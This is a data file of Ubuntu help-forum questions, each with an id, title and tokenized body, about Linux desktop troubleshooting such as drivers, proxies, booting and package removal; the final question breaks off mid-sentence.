349676	application 's icon - one file to please them all ?	in my application i define its icon within its myprogram.desktop-file in /usr/share/applications with icon=/opt/extras.ubuntu.com/myprogram/icons/mainicon.svg . i did not create any icons for the /usr/share/icons-directory . what i am wondering , is this : to make my application 's icon appear as big as the others in the dash , i have to maintain a relatively big white space around the icon itself ( using inkscape ) . so in the dash everything looks fine . but as the icon gets displayed in the unity launcher , the icon is much smaller than the others . what are the reasons for this ? for other applications that define more than one svg-icon , which of all these icons is used either for the dash/the launcher/the switcher ?
349678	is there any deep freeze-like application for ubuntu ?	i 'd like to know if there is any alternative to deep freeze for linux that still under development , because i 've read some things on the internet and looks like the same company which developed deep freeze had a linux version of it , but the project was discontinued .
349680	using ubuntu hotspot and squid	i 've installed a second wireless card on my laptop . using the hotspot function on ubuntu 13.04 , i 'm able to share the internet connection with my pupils ( they have no login for the wireless network ) . i 've also installed squid , but i had to set the proxy manually on my test tablet . how do i load the proxy automatically on connecting clients ? the proxy is transparent for the moment , but i want a certain control.i think i can find out how to block certain domains myself , but i want to be able to block sites at my lessons too . how do i block domains on the fly ? related to this , i would like to cut off internet access and let them return to my local host at any time , for instance to wrap up the lesson before the bell . how do i redirect them to my local web server , on the fly ? if the pupils are busy , i want to use the projector to show a constant flow of fetched urls , so they can help each other and i can keep a lookout while walking amongst them . i know i can use tail on the access.log , but are there other tools to get a list of accessed urls , without refusing write access on the log file ( preferably in python ) ? thanks in advance
349681	does ubuntu 12.04 work well with the asus vivobook s500 ?	i am planning to buy an asus vivobook s500 very soon and run ubuntu on it . this ultrabook has a touch screen and i want to make sure it will work perfectly with ubuntu . i found this video showing that double clicking , and in some cases scrolling do n't work with ubuntu 12.10 on the vivobook x202eďťż . i want to know if the s500 version has the same problem .
349684	how do i change the default domain when browsing windows shares ?	i am lucky enough to be able to use an ubuntu workstation at work , but i our company network is all windows-based . i can easily browse the network via the nautilus file browser ( by clicking 'browse network ' ) in the sidebar . of course , i have to authenticate myself using my windows domain password whenever i do so . but every single time that i am challenged to provide authentication , i have to change the domain from workgroup to my company 's verylongwindowsdomain : where is workgroup coming from , and how can i change it ?
349689	encrypted home drive - ssh ca n't access /etc/ssh/keys	i 'm basically trying to do what 's answered in this question : ssh remote user need to be logged in ? however , i 'm still getting permission denied in my logs . i have my permissions set up the same way as suggested . i will note , however , that i ca n't get into the keys folder without first doing sudo su as i get a permission denied error there as well . do i need to change some permissions here ? i thought that , since sshd runs as root , it should work , but i 'm not really sure what the issue is here .
349691	black screen after bios upgrade	i 'm right in the middle of setting up my new notebook and made quite a mess . it 's an lenovo ideopad n581 : 39,6 cm ( 15,6“ ) wxga , 1366 x 768 , 16:9 intel® core™ i5-3230m processor , 3rd generation ( 2.60 ghz , 3mb intel® smart-cache ) with intel® turbo boost bis zu 3.20 ghz intel hd grafik 4000 4 gb ddr3 1600 mhz ram 500 gb hard drive i first installed windows 8.1 pro and wanted to install a ubuntu gnome system ( 13.04 ) afterwards . since a 64bit version showed some kind kernel error , i installed a 32bit version . as far as i can tell , this went without errors , but i could'nt boot it , because some kind of uefi issue , i think . so i decided to customize my windows account first . i installed some drivers and a bios upgrade . ( bios 5ecn96ww to version 9 ) from there on everything went wrong . since i could'nt get it started , i deleted the linux system , by erasing the hard drive partitions through windows . afterwards i ran a ubuntu installer through windows . now windows boot-loader gave me the option to boot linux , which ended in a blank screen . every further attempt to install linux or even run a knoppix live disk ended in blank screens , where the ui should run . windows works fine nontheless ... i really do n't have a clue , how to go on from here . any hint would be great .
349693	how do i define the primary monitor in xfce ?	i 've set up multiple monitors in xfce per this answer , but my secondary monitor was chosen as the main one . how do i change which monitor is the main one ?
349694	install ubuntu 13 on top of existing 12 version	i have ubuntu 12.10 installation on my hard drive . i have broken python while trying to update it , so some critical applications does not function anymore . one of them is do-release-upgrade . so i wonder if i can install raring from dvd/usb without formatting the partition with existing installation within . or maybe i can recover existing installation somehow .
349701	installing ubuntu on pepper pad 2	i bought a pepper pad 2 and was wondering what would be the best release of ubuntu would be best . it is rather old and would like to find different uses out of it ?
349702	apt.conf `` acquire : :http : proxy `` proxyserver : port '' seems not to be used ( ubuntu 13.04 under virtual box on win7 )	this is for an installation of ubuntu 13.04 desktop in a virtualbox vm . i 'm on a corprate network with an http proxy at x.y.z.251:9090 . i 've configured the guest os with the autoconfiguration script , so firefox works fine , but i ca n't get `` apt-get '' or `` ubuntu software center '' to connect using the proxy . i created the file `` /etc/apt/apt.conf '' , it now contains a single line of text : acquire : :http : proxy `` http : //x.y.z.251:9090 '' which is what the proxy.pac file that i specified in `` system settings/network/network proxy '' and applied to the entire system . when i use firefox , a packet trace shows that the tcp connection is done via the corporate proxy at port 9090 , when i run `` ubuntu software center '' and `` apt-get '' , the packet trace shows tcp syn packets with the eventual destination ip address and port 80 . there , is of course , no response to the syn packets , since the corporate firewall blocks tcp connections on port 80 from getting in or out . with `` sudo apt-get '' in a terminal window , i always see : ign cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) raring/main translation-en_us ign cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) raring/main translation-en ign cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) raring/restricted translation-en_us ign cdrom : //ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) raring/restricted translation-en err http : //extras.ubuntu.com raring release.gpg could not connect to extras.ubuntu.com:80 ( 91.189.92.152 ) , connection timed out err http : //archive.canonical.com raring release.gpg can not initiate the connection to archive.canonical.com:80 ( 2001:67c:1360:8c01 : :1b ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1b 80 ] err http : //us.archive.ubuntu.com raring release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] err http : //us.archive.ubuntu.com raring-updates release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] err http : //us.archive.ubuntu.com raring-backports release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] 59 % [ connecting to security.ubuntu.com ( 91.189.91.14 ) ] eventually , i see : err http : //security.ubuntu.com raring-security release.gpg can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1360:8c01 : :18 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :18 80 ] reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/raring/release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/raring-updates/release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/raring-backports/release.gpg can not initiate the connection to us.archive.ubuntu.com:80 ( 2001:67c:1562 : :14 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :14 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/release.gpg can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1360:8c01 : :18 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :18 80 ] w : failed to fetch http : //archive.canonical.com/ubuntu/dists/raring/release.gpg can not initiate the connection to archive.canonical.com:80 ( 2001:67c:1360:8c01 : :1b ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1b 80 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/release.gpg could not connect to extras.ubuntu.com:80 ( 91.189.92.152 ) , connection timed out w : some index files failed to download . they have been ignored , or old ones used instead . i 'm not at all certain what i 'm doing wrong . -- - update -- -- i have also tried : acquire : :http : proxy `` http : //user : pass @ x.y.z.251:9090/ '' '' x.y.z '' are , of course , place-holders ; i doubt my employer 's security people would look kindly on me posting the actual numbers . i see no difference in the packet trace -- `` apt-get '' is still using the real ip addresses and port 80 . i made a deliberate mistake in the apt.conf file and `` apt-get '' exited with an error , so i 'm certain that it sees this configuration line for the proxy , it just does n't seem to honor it . i am using the `` nat '' networking connection , as it is against the it policy here to bridge between networks , and the dhcp server only provides addresses to known mac addresses . i do n't want it security banging on my cube ( again ) .
349704	ca n't install : dual boot on windows 7	i have a dell latitude e4310 with windows 7 installed on it . i want to install ubuntu 12.04 lts along side of the win7 . however , when i run the install i only have the option to replace windows 7 with ubuntu . what have i done wrong ?
349706	custom application icon does not appear	my application 's icon is not showing if i do not use an absolute path like here : [ desktop entry ] type=application name=myprogram genericname=myprogram comment=this is a comment icon=/opt/extras.ubuntu.com/myprogram/icons/myprogram.svg exec=myprogram categories=utility ; texttools ; hidden=false terminal=false type=application instead i write icon=myprogram just like i call the program with exec=myprogram , where it searches under /usr/bin . according to the free desktop standards i copied the icons to /usr/share/icons/hicolor and even deleted the icon-cache as described here with sudo gtk-update-icon-cache /usr/share/icons/hicolor . still my icon does not appear .
349712	why ca n't i set a static ip address for my linux box ?	i 'm trying to set up a static local ip address for my linux computer for port-forwarding purposes . as per every single guide that exists on this subject , i 've edited my /etc/network/interfaces and /etc/resolv.conf files accordingly . however , upon rebooting , any changes i 've made to resolv.conf are erased and the file is blank ( except for the comment that warns me of exactly that ) . as a result , i 'm unable to resolve hostnames ( ping google.com fails , for example ) . in fact , i ca n't even ping valid ip addresses ( `` destination host unreachable '' ) . although ifconfig seems to reflect all the settings i put in /etc/network/interfaces , i am unable to access the internet whatsoever , nor can i access the machine using ssh or ftp from another machine . here 's my /etc/network/interfaces : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.64 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 192.168.0.1 8.8.8.8 here 's what ifconfig gives me : eth0 link encap : ethernet hwaddr 00:25:90:57:7c:65 inet addr:192.168.0.64 bcast:192.168.0.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : fba00000-fba20000 eth1 link encap : ethernet hwaddr 00:25:90:57:7c:64 inet addr:192.168.0.10 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :225:90ff : fe57:7c64/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:252 errors:0 dropped:0 overruns:0 frame:0 tx packets:106 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:54010 ( 54.0 kb ) tx bytes:15731 ( 15.7 kb ) interrupt:16 memory : fb900000-fb920000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:94 errors:0 dropped:0 overruns:0 frame:0 tx packets:94 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8088 ( 8.0 kb ) tx bytes:8088 ( 8.0 kb ) why is this happening and how can i fix it ?
349715	deja-dup fails on dodgy wifi connection ?	my wife 's 13.10 laptop does n't get the best wireless signal . i have it set to run deja-dup using ftp to a local storage server . when a backup starts , it begins to do the backup , and then gets stuck at 'uploading ' at some point in the process . it just sits there until i click cancel in the gui . running top , before the backup stalls , i see duplicity and gvfsd-ftp processes using up cpu resources , but as soon as the system stalls , neither process shows up anymore . i 've also run into this issue with the nfs backend , which also seems to use gvfs . does anyone regularly use duplicity over ftp , and with a dodogy network connection ? does it work ?
349719	how do i set wine as default to run specific program	i am very new to ubuntu/linux . i have recently switched my laptop to ubuntu 13.04 after i had an issue with vista . i have downloaded one of my favorite old games , panzer general . i downloaded the zip file extracted it gotten the .exe file and am able to get it to run by right-clicking and using open with ... wine windows program loader . however , if i go into properties ( to make it the default ) , wine does not appear in the list of applications to 'open with ' and the add button is un-clickable . any help would be great , thanks !
349721	adding users and groups	i am new to this and i am trying to create users and groups . so far , i have the following : sudo adduser alice sudo adduser bob sudo adduser mike sudo adduser bill # create groups sudo groupadd student sudo groupadd admin # add users to groups sudo adduser alice student sudo adduser bob student sudo adduser mike student sudo adduser bill admin i want to modify /etc/sudoers so that any admin can run /bin/kill as any user . i am also looking to set passwords , which i am not familiar with . any assistance is greatly appreciated .
349722	trouble installing latest vagrant	thanks in advance for any help i can get . i 'm on raring . i require the latest vagrant in a work project and have followed these steps : $ apt-get install vagrant ( installs 1.0.3 ) downloaded the latest debian package from http : //downloads.vagrantup.com/ running the package through the software center , fails with error : `` software ca n't be installed or removed because the authentication service is not available . '' attempted to run package through software center with sudo : software center crashes . i also had a go at the ppa thanks again .
349725	uninstalling php5 . having done all i know to uninstall all of php5 for clean installation ... . i still haev all these files left !	desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= un libow-php5 < none > ( no description available ) rc php-codesniffe 1.3.4-1 all php , css and javascript coding st un php-imlib < none > ( no description available ) un php-kolab-filt < none > ( no description available ) un php-openid < none > ( no description available ) rc php-pear 5.4.9-4ubunt all pear - php extension and applicat un php-radius-leg < none > ( no description available ) un php-timer < none > ( no description available ) un php-xml-util < none > ( no description available ) un php4-pear < none > ( no description available ) rc php5-cli 5.4.9-4ubunt i386 command-line interpreter for the rc php5-common 5.4.9-4ubunt i386 common files for packages built f rc php5-curl 5.4.9-4ubunt i386 curl module for php5 un php5-dev < none > ( no description available ) rc php5-gd 5.4.9-4ubunt i386 gd module for php5 un php5-gpib < none > ( no description available ) un php5-idn < none > ( no description available ) rc php5-imagick 3.1.0~rc1-1b i386 imagemagick module for php5 rc php5-imap 5.4.6-0ubunt i386 imap module for php5 rc php5-intl 5.4.9-4ubunt i386 internationalisation module for p un php5-json < none > ( no description available ) rc php5-mcrypt 5.4.6-0ubunt i386 mcrypt module for php5 rc php5-memcache 3.0.7-2 i386 memcache extension module for php un php5-mhash < none > ( no description available ) rc php5-ming 1:0.4.4-1.1u i386 ming module for php5 un php5-suhosin < none > ( no description available ) un phpapi-2010052 < none > ( no description available ) un phpreports < none > ( no description available ) how can i get rid of them i have even tried sudo apt-get remove -- purge ... .. then naming each of them individually !
349730	`` starting restore sound card state '' fails and live usb boot hangs on macbookpro4,1	my mbp does n't have a working dvd drive , so i 'm unable to do a live cd . i 'm trying to install ubuntu andâafter removing the quiet and splash options and adding nomodesetâi can get ubuntu almost booting to the live environment and fully booting to the install-only environment . but when i try to boot to the live environment ( which i want to do so i can get wireless set up prior to installation ) it fails that step and then hangs after stopping some services ( the last one being crash report submitting darmon ) . i 'm attempting to install the latest beta , however i believe this issue would surface on earlier versions as well , based on some google searching . tomorrow i will try the latest release and maybe the lts release , but i doubt either will work . edit : while i was typing out this question , my screen turned off and i could wake it up by pressing a key , so the system is n't hanging , just the boot sequence .
349731	realtek semiconductor co. , ltd. 8179 driver - toshiba c55	i have read several threads , and for some reason ca n't win . i just got a new toshiba c55 , it has the realtek semiconductor co. , ltd. 8179 . i managed to get it to dual boot the preinstalled windows 8 with elementary os luna . out-of-the box neither the wifi of the ethernet worked . i got the ethernet working by following this guide : how to install network drivers in dell inspiron 5420 ? . how ever i ca n't seem to get the wireless working . i followed this guide how to install network drivers in dell inspiron 5420 ? and i feel like i got really close , but it still wo n't work . any help would be greatly accepted . i am not necessarily new to linux , but i 'm not especially versed in the command-line stuff , so dumb it down just a little : ) thanks ! !
349732	tar inexplicably trying to open a non-existent directory	i was trying to set up a script to download and untar some sources in a build script , but for some maddening reason tar seems to have gone insane , where it constantly attempts to do something with some long-gone folder . initially i was attempting to curl -l http : //www.example.com/tehcodez.tar.gz | tar -c assets -xz and i got a confusing error ... so i stripped it way down to tar x ( which should n't really do anything , but at least not die like it does ) , i get the truly inexplicable error : nick @ cody : ~/projects/website/ $ tar x tar : ~/projects/tape-worms/ : can not open : no such file or directory tar : error is not recoverable : exiting now ... tape-worms is some old project i was working on ( and the folder no longer exists ) , and i have no idea how tar is a ) pulling that path out of thin air , then b ) choking on it . it does n't matter what folder i 'm in , / , ~ , i get the exact same error .
349733	ubuntu 12.04.3 - touchpad not working	i recently got an acer laptop that had linpus linux loaded on it , i found out that 's not a very popular distribution so i am trying to install ubuntu 12.04.3 . i booted from flash drive and i get to the language selection screen but the mouse does nothing ; however , the keyboard works fine and i can continue through the prompts with they keyboard . i also tried a usb mouse and nothing . anybody have any idea why ? i am extremely new to linux and am unsure of what to do . any help is greatly appreciated . thanks
349734	uninstall ubuntu 12.04 and reinstall windows 8	i bought an hp computer a few weeks ago second hand and it has ubuntu 12.04 installed onto it . the guy i bought it off gave me the installation cd he used to put it on the computer but i really dont like it , i want to get windows back on the computer but have no idea how an earth to do that , i have a product key for windows 8 but no installation disk for it . how do i reinstall windows and uninstall ubuntu ? ? ? ? ?
349735	macbook air wifi problem	i have a macbook air with ubuntu 13.04 and i have wifi problems . no devices show up . i do n't have an ethernet port on my computer . i tried most forms but none of them worked ... any help would be appreciated
349740	ca n't boot from hard drive after replacing os with ubuntu	i uninstalled windows 7 recently and installed ubuntu 12.04 instead . however , after a successful installation , i could only boot from cd when i restarted my computer , which led to the screen asking if i wanted to try out ubuntu , or install it ( it was already installed though ) how do i fix this ?
349743	install huawei modem e3276 on ubuntu 13.04	can anyone explain me , step by step , how to proper install huawei modem e3276 on ubuntu 13.04 . the pendrive contents are : after running the result was : following the suggestion : thanks in advance ,
349747	text is getting messed up on the screen	my text is getting messed up on the screen in random way . depending on where i click or what i do some text on the screen gets messed up . i ca n't place any image because of the reputation points , but it 's a random blur . another issue that might be the reason of this blur is a rare but constant message of crash that keeps popping up . i forgot to get the details the last time but it says that the system has encountered an internal error . thanks for the help .
349750	keyboard layout not working , dead keys come alive at random times	i am using the keyboard layout english ( us international with dead keys ) . i type in english and in portuguese , which makes use of characters such as `` ç '' and `` é '' . when i discovered this layout it worked beautifully : i type `` ' '' , nothing happens , then i type `` e '' , and `` é '' is produced . then all of a sudden the dead keys had risen from their graves : trying to do the same above would produce this : 'e . i played around changing keyboard layouts back and forth and then all of a sudden it started working again . is this a bug ? could n't find anything exactly like i am experiencing . any workarounds ? edit : forgot to mention , running 12.04 here .
349752	battery indicator missing , can not install because no jdk 7	i 'm really new to the whole linux deal , but i 'm on a laptop and a battery gauge would be extremely helpful . whenever i try sudo apt-get install indicator-power it gives me : `reading package lists ... done building dependency tree reading state information ... done indicator-power is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up oracle-java7-installer ( 7u40-0~webupd8~0 ) ... downloading oracle java 7 ... -- 2013-09-24 20:06:32 -- http : //download.oracle.com/otn-pub/java/jdk/7u40-b43/jdk-7u40-linux-x64.tar.gz resolving false ( false ) ... failed : no such file or directory . wget : unable to resolve host address âfalseâ download failed oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ` any help would really be appreciated ! @ braiam when i ran the first command to correct the repositories , and it came back with : ca n't rename /etc/apt/sources.list.d/iaz-battery-status-quantal.list /etc/apt /sources.list.disable.d/iaz-battery-status-quantal.list.disable : no such file or directory ca n't rename /etc/apt/sources.list.d/ubuntu-wine-ppa-quantal.list /etc/apt/sources.list.disable.d/ubuntu-wine-ppa-quantal.list.disable : no such file or directory ca n't rename /etc/apt/sources.list.d/webupd8team-java-raring.list /etc/apt/sources.list.disable.d/webupd8team-java-raring.list.disable : no such file or directory @ braiam , now when i run it with that line , after every line i enter , there is this response after everything else seems to have worked aside from these : n : ignoring file 'ubuntu-wine-ppa-quantal.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'iaz-battery-status-quantal.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'webupd8team-java-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'ubuntu-wine-ppa-quantal.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'iaz-battery-status-quantal.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension n : ignoring file 'webupd8team-java-raring.list.disable ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension
349755	unable to connect to internet via wifi ( think it has to do with rtl8188ee driver )	i recently installed ubuntu 12.04 along side the preinstalled windows 8 on my hp pavillion touchsmart . i am able to connect to the internet through an ethernet connection , but my wifi is not working . if it helps , my wifi works on windows 8 . i think i may have figured out what the problem is . i do n't have the rtl8188ee driver installed , but i ca n't figure out how to install it . lspci -nn | grep 0280 : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) make : make : ~/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 $ make make -c /lib/modules/3.8.0-30-generic/build m=/home/mcarle/desktop /rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-30-generic' cc [ m ] /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 /base.o in file included from /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.c:39:0 : /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/pci.h:247:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ make [ 2 ] : *** [ /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o ] error 1 make [ 1 ] : *** [ _module_/home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-30-generic' make : *** [ all ] error 2 make install : sudo make install [ sudo ] password for mcarle : make -c /lib/modules/3.8.0-30-generic/build m=/home/mcarle/desktop /rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-30-generic' cc [ m ] /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o in file included from /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.c:39:0 : /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/pci.h:247:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ make [ 2 ] : *** [ /home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o ] error 1 make [ 1 ] : *** [ _module_/home/mcarle/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-30-generic' make : *** [ all ] error 2
349756	firmware issues with hvr-950q	i am trying to install hauppauge tv tuner hvr-950q on a system with quantal 12.10 . i bought one of these cards about a year ago and it worked great . i 'm trying to install a 2nd tuner now and i ca n't get it to work . earlier i checked dmesg and it looked like it was a firmware issue . i found this post and followed the directions . it does n't seem to have helped . now in the dmesg log it looks like it keeps trying to upload firmware ... here 's the relevant bit : [ 15174.768986 ] xc5000 : waiting for firmware upload ( dvb-fe-xc5000c-41.024.5.fw ) ... [ 15174.776088 ] xc5000 : upload failed . ( file not found ? ) does anyone have any suggestions ? i 'm kind-of at my wit 's end with this ... thank you in advance .
349757	error ( network unreachable ) resolving './dnskey/in ' : 2001:7fd : :1 # 53	i was trying to install dhcp3 server on ubuntu 12.04 ( precise pangolin ) 32-bit server . dhcp3 server is installed , but it ca n't find the dhcp3.conf file in folder /etc/dhcp3 . i used the command tail -f /var/log/syslog which displays this message : sep 25 08:23:05 ubuntu aptdaemon : info : quitting was requested sep 25 08:24:46 ubuntu named [ 1195 ] : error ( network unreachable ) resolving './dnskey/in ' : 2001:7fd : :1 # 53 sep 25 08:24:46 ubuntu named [ 1195 ] : error ( network unreachable ) resolving './ns/in ' : 2001:7fd : :1 # 53 sep 25 08:24:46 ubuntu named [ 1195 ] : error ( network unreachable ) resolving './dnskey/in ' : 2001:500:2f : :f # 53 sep 25 08:24:46 ubuntu named [ 1195 ] : error ( network unreachable ) resolving './ns/in ' : 2001:500:2f : :f # 53 sep 25 08:24:46 ubuntu named [ 1195 ] : error ( network unreachable ) resolving './dnskey/in ' : 2001:500:3 : :42 # 53 sep 25 08:32:51 ubuntu networkmanager [ 1097 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) sep 25 08:32:51 ubuntu networkmanager [ 1097 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) sep 25 08:35:03 ubuntu kernel : [ 1213.485377 ] type=1400 audit ( 1380078303.264:33 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=820 comm= '' cupsd '' pid=820 comm= '' cupsd '' capability=36 capname= '' block_suspend '' sep 25 08:39:01 ubuntu cron [ 2785 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) how do i solve this problem ?
349758	how to disable login notification in gnome 3.8 ubuntu 13.04	i like being able to chat from notification bar , but every second someone log on , very annoying . can i disable this ? if no how to disable whole thing ? thank you ! i am new to linux so far i love it : )
349759	after installing proprietary video drivers , shutdown works but reboot does n't	running 12.04 here . initially telling the computer to shutdown or restart via gui would make it get stuck on the screen with ubuntu and the dots . the fan was running , screen still on but nothing really happening . i would just hold the power button until it turned off , to actually shut it down . tried adding the `` acpi=force '' to grub but that did n't really do anything . i read some tips that the problem could be with the video drivers , so i installed the proprietary drivers for my card ( radeon 7770 hd ) and voilă , shutdown works perfectly now . restarting , however , still does n't : now there 's no ubuntu screen , but the machine is still turned on , and it stays like that indefinitely . saw somewhere that i could add `` reboot=efi '' to grub , tried that and it did n't work as well . my machine is a 4-year old dell xps 430 , not sure if this information is relevant or not , but there you go . i appreciate the help .
349760	lubuntu stuck in splash screen and not booting	upon the installation of the proprietary ati drivers for my video card , ( its a laptop , btw ) , i of course encountered the fact that my display wasnt working . i quickly fixed that , but upon reboot , it was stuck at the lubuntu 13.04 splash screen with all the dots full and not moving . pressing any combination of keys , ie ctrl+alt+f2 to open terminal , were are futile attempts . pressing alt+ctrl+del however , reset the computer . i would love to have this problem solved , and not labeled as the same exact things as other problems . ps : xorg says that it can not create a temporary file . just wanted to say that . any and all help is greatly appreciated . thank you .
349763	how can i change the date and time on ubuntu 12.04	when i go to change the date and time it does n't work , and i try to unlock but it just wo n't unlock , if there is any way to make it work please help . i know it is n't very descriptive but i really would like some answers . thank you
349764	sharing external hard drive at bootup	i am new to linux/ubuntu and i have spent some time setting up an external hard drive on my ubuntu computer to be shared across the network so it can be accessed and used from any computer using the network . i have already set it up to mount and share the hard drive at boot . in order to enable it to be accessed i use the command sudo smbpasswd -a username and create a password . i am then able to access the hard drive from any computer . i would like to know if there is any way to have this run at boot or bypass it entirely . i am running ubuntu 13.04 desktop with ubuntu lamp server installed as well . the hard drive is 250 gb formatted as ext4 . i am using windows computers to access the hard drive .
349766	kubuntu 13.04 is supported in acer 3680 model ?	i am now using ubuntu 12.04 lts in my acer 3680 model system . i want to change from ubnutu to kubuntu environment . but i tried with the usb bootable format.but it shows as boot error . is its not supported to acer 3680 model kubuntu ? . please help me what is the problem or how to change to kubuntu latest version or 13.04 kubuntu . please help me.thanks in advance .
349767	ca n't start pulseaudio ubuntu 12.04 | ca n't use usb headset	i have a logitech 590 usb headset that i can not get to work with ubuntu 12.04 . in my computer sound settings everything is absolutely blank . no options for inputs or outputs . i do have some regular speakers that work , and i can actually hear through the headset when i use skype . but i ca n't use the microphone at all , or hear through the headset in anything but skype . i believe it is becuase the pulseaudio server is not running . when i try to start it i see : $ pulseaudio -- start e : [ autospawn ] core-util.c : home directory /home/user not ours . w : [ autospawn ] lock-autospawn.c : can not access autospawn lock . e : [ pulseaudio ] main.c : failed to acquire autospawn lock also ... sudo start-pulseaudio-x11 failed to create secure directory : permission denied connection failure : connection refused pa_context_connect ( ) failed : connection refused trying to run pavucontrol gives me : connection to pulseaudio failed the alsamixer seems to be working . i do n't know much about it , but if i open up the gui and mess around it does seem to control my regular speakers . i have reinstalled pulseaudio and pavucontrol and this does n't seem to help . i either need to figure out how to get pulse audio started , or bypass it ( 